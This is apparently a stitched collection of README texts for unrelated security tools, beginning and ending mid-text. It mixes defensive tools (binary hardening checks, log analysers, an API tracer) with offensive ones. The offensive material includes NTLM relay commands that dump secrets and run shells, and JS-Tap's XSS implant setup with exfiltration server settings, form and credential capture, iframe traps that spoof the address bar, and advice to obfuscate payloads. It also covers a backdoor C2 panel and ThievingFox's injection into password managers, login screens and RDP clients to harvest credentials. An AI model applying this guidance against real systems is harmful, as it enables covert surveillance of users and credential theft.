timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique L engthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)
# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path
positional arguments:
path target dir or file path
optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm
NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py
from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py
, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.
Before you begin, ensure you have met the following requirements:
proxychains
properly configured with ntlmrelayx SOCKS relay portTo install NTLM Relay Gat, follow these steps:
Ensure that Python 3.6 or higher is installed on your system.
Clone NTLM Relay Gat repository:
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
NTLM Relay Gat is now installed and ready to use.
To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py
's socks
command output and that you have proxychains configured to use ntlmrelayx.py
's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:
# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10
# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell
# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets
# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs
# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.
This project is licensed under the MIT License - see the LICENSE file for details.
A command line Windows API tracing tool for Golang binaries.
Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!
Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.
The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.
Asmstdcall receives a single parameter which is pointer to something similar to the following structure:
struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;
[...]
}
Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.
The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.
The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).
If you want to know more about this project and research check the blogpost.
Download the latest release.
gftrace.exe <filepath> <params>
All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:
CreateFileW,ReadFile,CreateProcessW
The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.
The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.
Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:
- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
Tracing CreateProcessW() in the TunnelFish malware:
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)
[...]
Tracing multiple functions in the Sunshuttle malware:
- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)
[...]
Tracing multiple functions in the DeimosC2 framework agent:
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )
[...]
The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following: 1. readelf
and file
commands 2. python version 3 3. pip 4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan, the argument can get more than one file seperated by spaces.
Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.
Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements
You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams
Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814
Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719
A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um
I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.
JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.
The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.
Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.
The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.
Make sure you review the configuration section below carefully before using on a publicly exposed server.
Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.
The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.
Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.
Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.
In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.
Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.
Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.
A user refreshing the page will generally break/escape the iframe trap.
Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.
A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.
Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).
Example:
mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt
run in debug/single thread mode:
python3 jsTapServer.py
run with gunicorn multithreaded (production use):
./jstapRun.sh
A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.
If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.
Note that on Mac I also had to install libmagic outside of python.
brew install libmagic
Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.
If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.
For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).
If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.
When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.
To change the server port configuration see the last line of jsTapServer.py
app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')
Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.
A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.
At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.
Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
These configuration variables are in the initGlobals() function.
You need to configure the payload with the URL of the JS-Tap server it will connect back to.
window.taperexfilServer = "https://127.0.0.1:8444";
Set to either trap or implant This is set with the variable:
window.taperMode = "trap";
or
window.taperMode = "implant";
Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.
window.taperstartingPage = "http://targetapp.com/somestartpage";
If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:
window.taperstartingPage = window.location.href;
Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.
This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.
window.taperTag = 'whatever';
Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.
window.taperTaskCheck = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;
true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.
window.taperexfilHTML = true;
true/false setting on whether to intercept a copy of all form posts.
window.taperexfilFormSubmissions = true;
Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.
window.monkeyPatchAPIs = true;
By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.
window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;
Login with the admin credentials provided by the server script on startup.
Clients show up on the left, selecting one will show a time series of their events (loot) on the right.
The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.
Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.
When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.
Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.
The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.
Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.
[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.
In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.
You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.
The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.
To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.
A few tools are included in the tools subdirectory.
A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.
At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.
numClients = 50
You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:
apiServer = "https://127.0.0.1:8444"
JS-Tap run using gunicorn scales quite well.
A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.
Run with:
python3 monkeyPatchLab.py
By default this will start the application running on:
https://127.0.0.1:8443
Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js
function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}
Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.
You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.
No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.
@hoodoer
hoodoer@bitwisemunitions.dev
MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.
Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper
This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |
If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
๐ Anywhere Access: Reach the C2 Cloud from any location.
๐ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
๐ ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐ TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ Nginx: Effortlessly routing traffic between web and backend systems.
๐จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐พ Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:
Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.
Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.
Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.
User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
This project is actively developed, and future features may include:
The tool only requires Python 3 at the moment.
After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t
use -h or --help for more detailed usage examples : python3 WLA-cli.py -h
linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
